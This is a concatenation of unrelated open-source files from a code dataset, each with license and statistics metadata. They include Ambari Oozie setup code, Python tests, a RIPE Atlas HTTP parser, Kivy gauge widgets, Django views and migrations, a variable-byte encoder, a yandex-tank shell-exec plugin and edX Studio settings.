recursive_chown=True,
recursive_chmod=True,
replace_existing_files=True
)
Logger.info("Copying Atlas Hive hook properties file to Oozie Sharelib in DFS.")
atlas_hook_filepath_source = os.path.join(params.hive_conf_dir, params.atlas_hook_filename)
atlas_hook_file_path_dest_in_dfs = os.path.join(hive_sharelib_dir, params.atlas_hook_filename)
params.HdfsResource(atlas_hook_file_path_dest_in_dfs,
type="file",
source=atlas_hook_filepath_source,
action="create_on_execute",
owner=params.oozie_user,
group=params.hdfs_user,
mode=0755,
replace_existing_files=True
)
params.HdfsResource(None, action="execute")
# Update the sharelib after making any changes
# Use -oozie http(s):localhost:{oozie_server_admin_port}/oozie as oozie-env does not export OOZIE_URL
command = format("source {conf_dir}/oozie-env.sh ; oozie admin -oozie {oozie_base_url} -sharelibupdate")
code, out = call(command, user=params.oozie_user, tries=5, try_sleep=5, logoutput=True)
if code == 0 and out is not None:
Logger.info("Successfully updated the Oozie ShareLib")
else:
raise Exception("Could not update the Oozie ShareLib after uploading the Atlas Hive hook directory to DFS. "
"Code: %s" % str(code))
else:
raise Exception("Code is non-zero or output is empty. Code: %s" % str(code))
except Fail, e:
Logger.error("Failed to get Hive sharelib directory in DFS. %s" % str(e))
def download_database_library_if_needed(target_directory = None):
"""
Downloads the library to use when connecting to the Oozie database, if
necessary. The library will be downloaded to 'params.target' unless
otherwise specified.
:param target_directory: the location where the database library will be
downloaded to.
:return:
"""
import params
jdbc_drivers = ["com.mysql.jdbc.Driver",
"com.microsoft.sqlserver.jdbc.SQLServerDriver",
"oracle.jdbc.driver.OracleDriver","sap.jdbc4.sqlanywhere.IDriver"]
# check to see if the JDBC driver name is in the list of ones that need to
# be downloaded
if params.jdbc_driver_name not in jdbc_drivers or not params.jdbc_driver_jar:
return
if params.previous_jdbc_jar and os.path.isfile(params.previous_jdbc_jar):
File(params.previous_jdbc_jar, action='delete')
# if the target directory is not specified
if target_directory is None:
target_jar_with_directory = params.target
else:
# create the full path using the supplied target directory and the JDBC JAR
target_jar_with_directory = target_directory + os.path.sep + params.jdbc_driver_jar
if not os.path.exists(target_jar_with_directory):
File(params.downloaded_custom_connector,
content = DownloadSource(params.driver_curl_source))
if params.sqla_db_used:
untar_sqla_type2_driver = ('tar', '-xvf', params.downloaded_custom_connector, '-C', params.tmp_dir)
Execute(untar_sqla_type2_driver, sudo = True)
Execute(format("yes | {sudo} cp {jars_path_in_archive} {oozie_libext_dir}"))
Directory(params.jdbc_libs_dir,
create_parents = True)
Execute(format("yes | {sudo} cp {libs_path_in_archive} {jdbc_libs_dir}"))
Execute(format("{sudo} chown -R {oozie_user}:{user_group} {oozie_libext_dir}/*"))
else:
Execute(('cp', '--remove-destination', params.downloaded_custom_connector, target_jar_with_directory),
path=["/bin", "/usr/bin/"],
sudo = True)
File(target_jar_with_directory, owner = params.oozie_user,
group = params.user_group)
| apache-2.0 | 5,204,235,272,387,705,000 | 41.728597 | 262 | 0.665956 | false |
jorisvandenbossche/ircelsos | ircelsos/tests/test_util.py | 1 | 1165 | # -*- coding: utf-8 -*-
from __future__ import print_function, division
import pytest
from ircelsos.util import print_stations, print_pollutants
def strip(s):
s = s.splitlines()
s = [line.strip() for line in s]
s = "\n".join(s)
return s
@pytest.mark.usefixtures("capsys")
class TestTablePrinting():
def test_print_stations(self, capsys):
print_stations(['BETR801', 'BETR802'])
out, err = capsys.readouterr()
expected = """name | EU_code | location | region | type
-------+---------+------------+--------+--------
42R801 | BETR801 | Borgerhout | urban | Traffic
42R802 | BETR802 | Borgerhout | urban | Traffic
"""
assert strip(out) == strip(expected)
def test_print_pollutants(self, capsys):
print_pollutants(['42602 - NO2', '44201 - O3'])
out, err = capsys.readouterr()
expected = """id | short | name | stations
------------+-------+------------------+---------
42602 - NO2 | no2 | Nitrogen dioxide | 105
44201 - O3 | o3 | Ozone | 47
"""
assert strip(out) == strip(expected)
| bsd-2-clause | 5,899,053,136,330,087,000 | 26.738095 | 71 | 0.556223 | false |
PhilipHomburg/ripe.atlas.sagan | ripe/atlas/sagan/http.py | 1 | 2943 | from .base import Result, ValidationMixin
class Response(ValidationMixin):
def __init__(self, data, **kwargs):
ValidationMixin.__init__(self, **kwargs)
self.raw_data = data
self.af = self.ensure("af", int)
self.body_size = self.ensure("bsize", int)
self.head_size = self.ensure("hsize", int)
self.destination_address = self.ensure("dst_addr", str)
self.source_address = self.ensure("src_addr", str)
self.code = self.ensure("res", int)
self.response_time = self.ensure("rt", float)
self.version = self.ensure("ver", str)
if not self.destination_address:
self.destination_address = self.ensure("addr", str, self.destination_address)
if not self.source_address:
self.source_address = self.ensure("srcaddr", str, self.source_address)
if not self.code:
self._handle_malformation("No response code available")
error = self.ensure("err", str)
if error:
self._handle_error(error)
class HttpResult(Result):
METHOD_GET = "GET"
METHOD_POST = "POST"
METHOD_PUT = "PUT"
METHOD_DELETE = "DELETE"
METHOD_HEAD = "HEAD"
METHODS = {
METHOD_GET: "GET",
METHOD_POST: "POST",
METHOD_PUT: "PUT",
METHOD_DELETE: "DELETE",
METHOD_HEAD: "HEAD"
}
def __init__(self, data, **kwargs):
Result.__init__(self, data, **kwargs)
self.uri = self.ensure("uri", str)
self.method = None
self.responses = []
if "result" not in self.raw_data:
self._handle_malformation("No result value found")
return
if isinstance(self.raw_data["result"], list):
# All modern results
for response in self.raw_data["result"]:
self.responses.append(Response(response, **kwargs))
if self.responses:
method = self.raw_data["result"][0].get(
"method",
self.raw_data["result"][0].get("mode") # Firmware == 4300
)
if method:
method = method.replace("4", "").replace("6", "")
if method in self.METHODS.keys():
self.method = self.METHODS[method]
else:
# Firmware <= 1
response = self.raw_data["result"].split(" ")
self.method = response[0].replace("4", "").replace("6", "")
self.responses.append(Response({
"dst_addr": response[1],
"rt": float(response[2]) * 1000,
"res": int(response[3]),
"hsize": int(response[4]),
"bsize": int(response[5]),
}))
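# Illustrative firmware <= 1 result string handled by the else-branch
# above (all field values hypothetical):
#   "GET4 193.0.6.1 0.123 200 155 1024"
#   => method "GET", destination 193.0.6.1, rt 123.0 ms, code 200,
#      head 155 bytes, body 1024 bytes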
__all__ = (
"HttpResult"
)
| gpl-3.0 | 4,170,459,175,948,925,000 | 29.978947 | 89 | 0.49983 | false |
autosportlabs/RaceCapture_App | autosportlabs/racecapture/widgets/heat/heatgauge.py | 1 | 6048 | #
# Race Capture App
#
# Copyright (C) 2014-2017 Autosport Labs
#
# This file is part of the Race Capture App
#
# This is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
# See the GNU General Public License for more details. You should
# have received a copy of the GNU General Public License along with
# this code. If not, see <http://www.gnu.org/licenses/>.
import kivy
kivy.require('1.10.0')
from kivy.uix.anchorlayout import AnchorLayout
from kivy.app import Builder
from kivy.graphics import *
from kivy.properties import NumericProperty, ListProperty, StringProperty
from kivy.logger import Logger
from autosportlabs.uix.color.colorgradient import HeatColorGradient
from kivy.core.image import Image as CoreImage
HEAT_GAUGE_KV = """
<TireHeatGauge>:
"""
class BrakeHeatGauge(AnchorLayout):
Builder.load_string(HEAT_GAUGE_KV)
zones = NumericProperty(None)
CENTER_SIZE_PCT = 0.5
ROTOR_IMAGE = CoreImage('autosportlabs/racecapture/widgets/heat/rotor.png')
TIRE_IMAGE = CoreImage('autosportlabs/racecapture/widgets/heat/tire.png')
def __init__(self, **kwargs):
super(BrakeHeatGauge, self).__init__(**kwargs)
self.heat_gradient = HeatColorGradient()
self.colors = []
self.values = []
self._init_view()
self.bind(pos=self._update_gauge)
self.bind(size=self._update_gauge)
self.bind(zones=self._update_gauge)
def on_zones(self, instance, value):
self._sync_zones()
def _init_view(self):
self._sync_zones()
def _sync_zones(self):
zones = self.zones
if zones is None:
return
values = self.values
values.extend([0] * (zones - len(values)))
colors = self.colors
        # use a comprehension so each zone gets its own Color instance
        colors.extend([Color() for _ in range(zones - len(colors))])
self._update_gauge()
def set_value(self, zone, value):
try:
rgba = self.heat_gradient.get_color_value(value)
self.colors[zone].rgba = rgba
self.values[zone] = value
except IndexError:
pass
def _update_gauge(self, *args):
self.canvas.clear()
zones = self.zones
if zones is None or zones == 0:
return
x = self.pos[0]
y = self.pos[1]
width = self.size[0]
height = self.size[1]
min_size = min(width, height)
center_size = min_size * BrakeHeatGauge.CENTER_SIZE_PCT
rw = ((min_size - center_size) / float(zones))
center_x = x + (width / 2)
center_y = y + (height / 2)
index = zones
with self.canvas:
for i in range(0, zones):
color = self.heat_gradient.get_color_value(self.values[index - 1])
c = Color(rgba=color)
self.colors[index - 1] = c
segment_size = (index * (rw)) + center_size
c_x = center_x - segment_size / 2
c_y = center_y - segment_size / 2
Ellipse(pos=(c_x, c_y), size=(segment_size, segment_size))
index -= 1
Color(1.0, 1.0, 1.0, 1.0)
r_x = center_x - (center_size / 2)
r_y = center_y - (center_size / 2)
Rectangle(texture=BrakeHeatGauge.ROTOR_IMAGE.texture, pos=(r_x, r_y), size=(center_size, center_size))
def on_values(self, instance, value):
pass
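# Usage sketch (hypothetical values; set_value() expects a 0.0-1.0 heat
# fraction, which HeatColorGradient maps to a color):
#   gauge = BrakeHeatGauge(zones=4)
#   gauge.set_value(0, 0.25)   # innermost ring
#   gauge.set_value(3, 0.90)   # outermost ring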
class TireHeatGauge(AnchorLayout):
Builder.load_string(HEAT_GAUGE_KV)
zones = NumericProperty(None)
direction = StringProperty('left-right')
def __init__(self, **kwargs):
super(TireHeatGauge, self).__init__(**kwargs)
self.heat_gradient = HeatColorGradient()
self.colors = []
self.values = []
self._init_view()
self.bind(pos=self._update_gauge)
self.bind(size=self._update_gauge)
self.bind(zones=self._update_gauge)
self.bind(direction=self._update_gauge)
def on_zones(self, instance, value):
self._sync_zones()
def _init_view(self):
self._sync_zones()
def _sync_zones(self):
zones = self.zones
if zones is None:
return
values = self.values
values.extend([0] * (zones - len(values)))
colors = self.colors
        # use a comprehension so each zone gets its own Color instance
        colors.extend([Color() for _ in range(zones - len(colors))])
self._update_gauge()
def set_value(self, zone, value):
try:
rgba = self.heat_gradient.get_color_value(value)
self.colors[zone].rgba = rgba
self.values[zone] = value
except IndexError:
pass
def _update_gauge(self, *args):
self.canvas.clear()
zones = self.zones
if zones is None or zones == 0:
return
x = self.pos[0]
y = self.pos[1]
width = self.size[0]
height = self.size[1]
rw = width / float(zones)
if self.direction == 'left-right':
index = 0
index_dir = 1
elif self.direction == 'right-left':
index = zones - 1
index_dir = -1
else:
            raise Exception('Invalid direction {}'.format(self.direction))
with self.canvas:
for i in range(0, zones):
xp = x + (rw * i)
color = self.heat_gradient.get_color_value(self.values[index])
c = Color(rgba=color)
self.colors[index] = c
Rectangle(pos=(xp, y), size=(rw, height))
index += index_dir
Color(rgba=(0.0, 0.0, 0.0, 1.0))
Rectangle(texture=BrakeHeatGauge.TIRE_IMAGE.texture, pos=(x, y), size=(width, height))
def on_values(self, instance, value):
pass
| gpl-3.0 | 8,670,585,709,165,813,000 | 30.831579 | 114 | 0.582837 | false |
stencila/hub | manager/projects/ui/views/reviews.py | 1 | 1679 | from django.http import HttpRequest, HttpResponse
from django.shortcuts import render
from projects.api.serializers import ReviewUpdateSerializer
from projects.api.views.reviews import ProjectsReviewsViewSet
def list(request: HttpRequest, *args, **kwargs) -> HttpResponse:
"""
List reviews for a project.
"""
viewset = ProjectsReviewsViewSet.init("list", request, args, kwargs)
reviews = viewset.get_queryset()
context = viewset.get_response_context(queryset=reviews)
meta = viewset.get_project().get_meta()
return render(request, "projects/reviews/list.html", dict(**context, meta=meta))
def create(request: HttpRequest, *args, **kwargs) -> HttpResponse:
"""
Create a review for a project.
"""
viewset = ProjectsReviewsViewSet.init("create", request, args, kwargs)
serializer = viewset.get_serializer()
context = viewset.get_response_context(serializer=serializer)
meta = viewset.get_project().get_meta()
return render(request, "projects/reviews/create.html", dict(**context, meta=meta))
def retrieve(request: HttpRequest, *args, **kwargs) -> HttpResponse:
"""
Retrieve a review from a project.
"""
viewset = ProjectsReviewsViewSet.init("retrieve", request, args, kwargs)
review = viewset.get_object()
context = viewset.get_response_context(instance=review)
serializer = (
ReviewUpdateSerializer()
if context.get("is_editor") or context.get("is_user")
else None
)
meta = viewset.get_project().get_meta()
return render(
request,
"projects/reviews/retrieve.html",
dict(**context, serializer=serializer, meta=meta),
)
| apache-2.0 | -6,900,870,597,921,345,000 | 34.723404 | 86 | 0.69327 | false |
mxmaslin/Test-tasks | tests_django/apps/playschool/migrations/0001_initial.py | 1 | 1954 | # Generated by Django 2.1.1 on 2018-09-29 17:59
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Record',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(auto_now_add=True)),
('has_came_with', models.CharField(choices=[('M', 'Mother'), ('F', 'Father')], default='M', max_length=1)),
('time_arrived', models.DateTimeField()),
('time_departed', models.DateTimeField()),
],
options={
'ordering': ('-date',),
},
),
migrations.CreateModel(
name='Scholar',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.ImageField(blank=True, null=True, upload_to='playschool/images/%Y/%m/%d')),
('name', models.CharField(max_length=50)),
('sex', models.CharField(choices=[('M', 'Boy'), ('F', 'Girl')], default='F', max_length=1)),
('birth_date', models.DateField()),
('school_class', models.PositiveIntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(11)])),
('is_studying', models.BooleanField()),
],
options={
'ordering': ('school_class', 'name'),
},
),
migrations.AddField(
model_name='record',
name='scholar',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='playschool.Scholar'),
),
]
| gpl-3.0 | 5,469,782,674,536,385,000 | 38.877551 | 177 | 0.547083 | false |
minddistrict/doublespeak | setup.py | 1 | 1486 | from setuptools import setup, find_packages
version = '0.4.dev0'
long_desc = open("README.rst").read() + "\n" + open('CHANGES.txt').read()
setup(
name='doublespeak',
version=version,
author='Minddistrict',
url='https://github.com/minddistrict/doublespeak',
license='BSD',
package_dir={'': 'src'},
packages=find_packages('src'),
keywords='Javascript translations Babel',
classifiers=[
"Programming Language :: Python",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Topic :: Software Development :: Internationalization",
"Programming Language :: Python :: 2.7"
],
description="Babel/distutils commands to help with managing Javascript "
"translations.",
long_description=long_desc,
include_package_data=True,
namespace_packages=[],
zip_safe=False,
install_requires=[
'setuptools',
'Babel'
],
entry_points={
'distutils.commands': [
'compile_js_catalog = doublespeak.message:compile_js_catalog',
'extract_js_messages = doublespeak.message:extract_js_messages',
'init_js_catalog = doublespeak.message:init_js_catalog',
'update_js_catalog = doublespeak.message:update_js_catalog',
],
'distutils.setup_keywords': [
'js_message_extractors = '
'doublespeak.message:check_js_message_extractors'
]},
)
| bsd-3-clause | 2,762,498,902,893,273,000 | 33.55814 | 76 | 0.612382 | false |
handsomegui/Gereqi | gereqi/Ui_about.py | 1 | 4402 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'about.ui'
#
# Created: Fri Sep 10 23:16:30 2010
# by: PyQt4 UI code generator 4.7.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_About(object):
def setupUi(self, About):
About.setObjectName("About")
About.resize(253, 309)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/Icons/app.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
About.setWindowIcon(icon)
self.gridLayout = QtGui.QGridLayout(About)
self.gridLayout.setObjectName("gridLayout")
self.buttonBox = QtGui.QDialogButtonBox(About)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Close)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 1, 0, 1, 1)
self.textBrowser = QtGui.QTextBrowser(About)
self.textBrowser.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
self.textBrowser.setFrameShape(QtGui.QFrame.NoFrame)
self.textBrowser.setFrameShadow(QtGui.QFrame.Plain)
self.textBrowser.setTabChangesFocus(True)
self.textBrowser.setAcceptRichText(False)
self.textBrowser.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
self.textBrowser.setOpenExternalLinks(True)
self.textBrowser.setOpenLinks(False)
self.textBrowser.setObjectName("textBrowser")
self.gridLayout.addWidget(self.textBrowser, 0, 0, 1, 1)
self.retranslateUi(About)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL("accepted()"), About.accept)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL("rejected()"), About.reject)
QtCore.QMetaObject.connectSlotsByName(About)
def retranslateUi(self, About):
About.setWindowTitle(QtGui.QApplication.translate("About", "About Gereqi", None, QtGui.QApplication.UnicodeUTF8))
self.textBrowser.setHtml(QtGui.QApplication.translate("About", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Droid Sans\'; font-size:10pt; font-weight:400; font-style:normal;\">\n"
"<p align=\"right\" style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><img src=\":/Icons/app.png\" /></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:18pt; font-weight:600;\"></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:18pt; font-weight:600;\">Gereqi</span></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">version 0.4.2</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">© 2009,2010 Contributors</p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"></p>\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\">Visit <a href=\"http://code.google.com/p/gereqi/\"><span style=\" text-decoration: underline; color:#e85290;\">http://code.google.com/p/gereqi/</span></a></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
| gpl-3.0 | -5,543,503,231,855,172,000 | 72.35 | 335 | 0.696887 | false |
enfk/hugedatabook-vbcode-python | VariableBiteCode.py | 1 | 3087 | #!/usr/bin/env python
from struct import pack, unpack
# http://nlp.stanford.edu/IR-book/html/htmledition/variable-byte-codes-1.html
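# Worked example (added sketch, not from the original file): 824 is
# 0b1100111000. Split from the low end into 7-bit groups: 0111000 (56)
# and 0000110 (6). Groups are emitted most-significant first, and the
# final byte carries the stop flag (+128), so 824 encodes as the two
# bytes 00000110 10111000.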
def vb_encode(numbers):
if isinstance(numbers, int):
return vb_encode_number(numbers)
bytestream = ''
for n in numbers:
bytes = vb_encode_number(n)
bytestream += bytes
return bytestream
def vb_encode_number_orginal(n):
bytes = []
bytestream = ''
while True:
bytes.insert(0, n%128)
if n < 128:
break
n = n / 128
bytes[-1] += 128
for byte in bytes:
bytestream += pack('B', byte)
return bytestream
# http://websystemsengineering.blogspot.jp/2012/12/variable-byte-code-how-to.html
def vb_encode_number(n):
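    # Layout note (added comment): the first pass emits the lowest 7 bits
    # with the high bit set; every later pass prepends its byte, so the
    # flagged byte always ends up last in the stream and marks the end of
    # the encoded number.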
i = 0
bytestream = ''
while True:
if i == 0:
bytestream += pack('B', (n & 0b1111111) + 128)
else:
bytestream = pack('B', (n & 0b1111111)) + bytestream
if n < 128:
break
n = n >> 7
i += 1
return bytestream
def vb_decode(bytestream):
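    # Added comment: accumulate 7-bit groups into n; a byte with the high
    # bit set (value >= 128) terminates the current number.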
numbers = []
n = 0
unpacked = unpack('%dB' % len(bytestream), bytestream)
for i in range(len(unpacked)):
if unpacked[i] < 128:
n = 128 * n + unpacked[i]
else:
n = 128 * n + (unpacked[i] - 128)
numbers.append(n)
n = 0
return numbers
# http://www.ninxit.com/blog/2010/12/15/vbcode-python/
def vb_encode_X(numbers):
if isinstance(numbers, int):
numbers = [numbers]
bytestream = ''
for n in numbers:
bytes = []
while True:
bytes.insert(0, n % 128)
if n < 128:
break
n = n / 128
bytes[-1] += 128
bytestream += pack('%dB' % len(bytes), *bytes)
return bytestream
def vb_decode_X(bytestream):
n = 0
numbers = []
bytestream = unpack('%dB' % len(bytestream), bytestream)
for byte in bytestream:
if byte < 128:
n = 128 * n + byte
else:
n = 128 * n + (byte - 128)
numbers.append(n)
n = 0
return numbers
def get_bit(byteval,idx):
    return (byteval & (1 << idx)) != 0
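# Usage sketch (added): get_bit(0b10000101, 7) -> True; get_bit(0b10000101, 1) -> False.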
# test
if __name__ == '__main__':
    # format() requires Python 2.6 or later.
bytestream = vb_encode([17,0,0])
print ''.join([format(b, '08b') for b in unpack('%dB' % len(bytestream), bytestream)])
print vb_decode(bytestream)
def test_vb_encode(numbers, ok):
bytestream = vb_encode(numbers)
assert ''.join([format(b, '08b') for b in unpack('%dB' % len(bytestream), bytestream)]) == ok
print "test ok. %s -> %s" % (numbers, ok)
test_vb_encode(1, '10000001')
test_vb_encode(5, '10000101')
test_vb_encode(127, '11111111')
test_vb_encode(128, '00000001' + '10000000')
test_vb_encode(129, '00000001' + '10000001')
test_vb_encode(210192, '00001100'+'01101010'+'10010000')
import sys, random
for i in xrange(1000):
n = random.randint(0, sys.maxint)
assert vb_decode(vb_encode(n))[0] == n
| mit | -3,475,025,522,714,339,000 | 26.078947 | 101 | 0.547133 | false |
nnugumanov/yandex-tank | yandextank/plugins/ShellExec/plugin.py | 1 | 2286 | '''
Contains shellexec plugin
'''
from ...common import util
from ...common.interfaces import AbstractPlugin
class Plugin(AbstractPlugin):
'''
ShellExec plugin
    Allows executing shell scripts before/after the test
'''
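    # Example config (a sketch, assuming yandex-tank's INI-style config;
    # option names match get_available_options() below):
    #   [shellexec]
    #   prepare=./warmup.sh
    #   start=echo "test started"
    #   poll=./check_target_alive.sh
    #   end=./cooldown.sh
    # A non-zero exit code from the poll command interrupts the test.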
SECTION = 'shellexec'
def __init__(self, core, config_section):
AbstractPlugin.__init__(self, core, config_section)
self.catch_out = False
self.end = None
self.poll = None
self.prepare = None
self.start = None
self.postprocess = None
@staticmethod
def get_key():
return __file__
def get_available_options(self):
return ["prepare", "start", "end", "poll", "post_process", "catch_out"]
def configure(self):
self.catch_out = True if self.get_option("catch_out", False) else False
self.prepare = self.get_option("prepare", '')
self.start = self.get_option("start", '')
self.end = self.get_option("end", '')
self.poll = self.get_option("poll", '')
self.postprocess = self.get_option("post_process", '')
def prepare_test(self):
if self.prepare:
self.execute(self.prepare)
def start_test(self):
if self.start:
self.execute(self.start)
def is_test_finished(self):
if self.poll:
self.log.info("Executing: %s", self.poll)
retcode = util.execute(
self.poll,
shell=True,
poll_period=0.1,
catch_out=self.catch_out)[0]
if retcode:
self.log.warn(
"Non-zero exit code, interrupting test: %s", retcode)
return retcode
return -1
def end_test(self, retcode):
if self.end:
self.execute(self.end)
return retcode
def post_process(self, retcode):
if self.postprocess:
self.execute(self.postprocess)
return retcode
def execute(self, cmd):
'''
Execute and check exit code
'''
self.log.info("Executing: %s", cmd)
retcode = util.execute(
cmd, shell=True, poll_period=0.1, catch_out=self.catch_out)[0]
if retcode:
raise RuntimeError("Subprocess returned %s" % retcode)
| lgpl-2.1 | 941,401,629,749,793,200 | 27.936709 | 79 | 0.559055 | false |
chrisfilda/edx_platform | cms/envs/common.py | 1 | 18237 | # -*- coding: utf-8 -*-
"""
This is the common settings file, intended to set sane defaults. If you have a
piece of configuration that's dependent on a set of feature flags being set,
then create a function that returns the calculated value based on the value of
FEATURES[...]. Modules that extend this one can change the feature
configuration in an environment specific config file and re-calculate those
values.
We should make a method that calls all these config methods so that you just
make one call at the end of your site-specific dev file to reset all the
dependent variables (like INSTALLED_APPS) for you.
Longer TODO:
1. Right now our treatment of static content in general and in particular
course-specific static content is haphazard.
2. We should have a more disciplined approach to feature flagging, even if it
just means that we stick them in a dict called FEATURES.
3. We need to handle configuration for multiple courses. This could be as
multiple sites, but we do need a way to map their data assets.
"""
# We intentionally define lots of variables that aren't used, and
# want to import all variables from base settings files
# pylint: disable=W0401, W0611, W0614
import imp
import sys
import lms.envs.common
from lms.envs.common import (
USE_TZ, TECH_SUPPORT_EMAIL, PLATFORM_NAME, BUGS_EMAIL, DOC_STORE_CONFIG, ALL_LANGUAGES, WIKI_ENABLED
)
from path import path
from lms.lib.xblock.mixin import LmsBlockMixin
from cms.lib.xblock.mixin import CmsBlockMixin
from dealer.git import git
############################ FEATURE CONFIGURATION #############################
FEATURES = {
'USE_DJANGO_PIPELINE': True,
'GITHUB_PUSH': False,
# for consistency in user-experience, keep the value of the following 3 settings
# in sync with the ones in lms/envs/common.py
'ENABLE_DISCUSSION_SERVICE': True,
'ENABLE_TEXTBOOK': True,
'ENABLE_STUDENT_NOTES': True,
'AUTH_USE_CERTIFICATES': False,
# email address for studio staff (eg to request course creation)
'STUDIO_REQUEST_EMAIL': '',
'STUDIO_NPS_SURVEY': True,
# Segment.io - must explicitly turn it on for production
'SEGMENT_IO': False,
# Enable URL that shows information about the status of various services
'ENABLE_SERVICE_STATUS': False,
# Don't autoplay videos for course authors
'AUTOPLAY_VIDEOS': False,
# If set to True, new Studio users won't be able to author courses unless
# edX has explicitly added them to the course creator group.
'ENABLE_CREATOR_GROUP': False,
# whether to use password policy enforcement or not
'ENFORCE_PASSWORD_POLICY': False,
# If set to True, Studio won't restrict the set of advanced components
# to just those pre-approved by edX
'ALLOW_ALL_ADVANCED_COMPONENTS': False,
# Turn off account locking if failed login attempts exceeds a limit
'ENABLE_MAX_FAILED_LOGIN_ATTEMPTS': False,
# Allow editing of short description in course settings in cms
'EDITABLE_SHORT_DESCRIPTION': True,
# Hide any Personally Identifiable Information from application logs
'SQUELCH_PII_IN_LOGS': False,
# Toggles embargo functionality
'EMBARGO': False,
# Turn on/off Microsites feature
'USE_MICROSITES': False,
# Allow creating courses with non-ascii characters in the course id
'ALLOW_UNICODE_COURSE_ID': False,
# Prevent concurrent logins per user
'PREVENT_CONCURRENT_LOGINS': False,
# Turn off Advanced Security by default
'ADVANCED_SECURITY': False,
# Temporary feature flag for duplicating xblock leaves
'ENABLE_DUPLICATE_XBLOCK_LEAF_COMPONENT': False,
# Temporary feature flag for deleting xblock leaves
'ENABLE_DELETE_XBLOCK_LEAF_COMPONENT': False,
}
ENABLE_JASMINE = False
############################# SET PATH INFORMATION #############################
PROJECT_ROOT = path(__file__).abspath().dirname().dirname() # /edx-platform/cms
REPO_ROOT = PROJECT_ROOT.dirname()
COMMON_ROOT = REPO_ROOT / "common"
LMS_ROOT = REPO_ROOT / "lms"
ENV_ROOT = REPO_ROOT.dirname() # virtualenv dir /edx-platform is in
GITHUB_REPO_ROOT = ENV_ROOT / "data"
sys.path.append(REPO_ROOT)
sys.path.append(PROJECT_ROOT / 'djangoapps')
sys.path.append(COMMON_ROOT / 'djangoapps')
sys.path.append(COMMON_ROOT / 'lib')
# For geolocation ip database
GEOIP_PATH = REPO_ROOT / "common/static/data/geoip/GeoIP.dat"
############################# WEB CONFIGURATION #############################
# This is where we stick our compiled template files.
from tempdir import mkdtemp_clean
MAKO_MODULE_DIR = mkdtemp_clean('mako')
MAKO_TEMPLATES = {}
MAKO_TEMPLATES['main'] = [
PROJECT_ROOT / 'templates',
COMMON_ROOT / 'templates',
COMMON_ROOT / 'djangoapps' / 'pipeline_mako' / 'templates',
COMMON_ROOT / 'djangoapps' / 'pipeline_js' / 'templates',
]
for namespace, template_dirs in lms.envs.common.MAKO_TEMPLATES.iteritems():
MAKO_TEMPLATES['lms.' + namespace] = template_dirs
TEMPLATE_DIRS = MAKO_TEMPLATES['main']
EDX_ROOT_URL = ''
LOGIN_REDIRECT_URL = EDX_ROOT_URL + '/signin'
LOGIN_URL = EDX_ROOT_URL + '/signin'
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.request',
'django.core.context_processors.static',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.i18n',
'django.contrib.auth.context_processors.auth', # this is required for admin
'django.core.context_processors.csrf',
'dealer.contrib.django.staff.context_processor', # access git revision
'contentstore.context_processors.doc_url',
)
# use the ratelimit backend to prevent brute force attacks
AUTHENTICATION_BACKENDS = (
'ratelimitbackend.backends.RateLimitModelBackend',
)
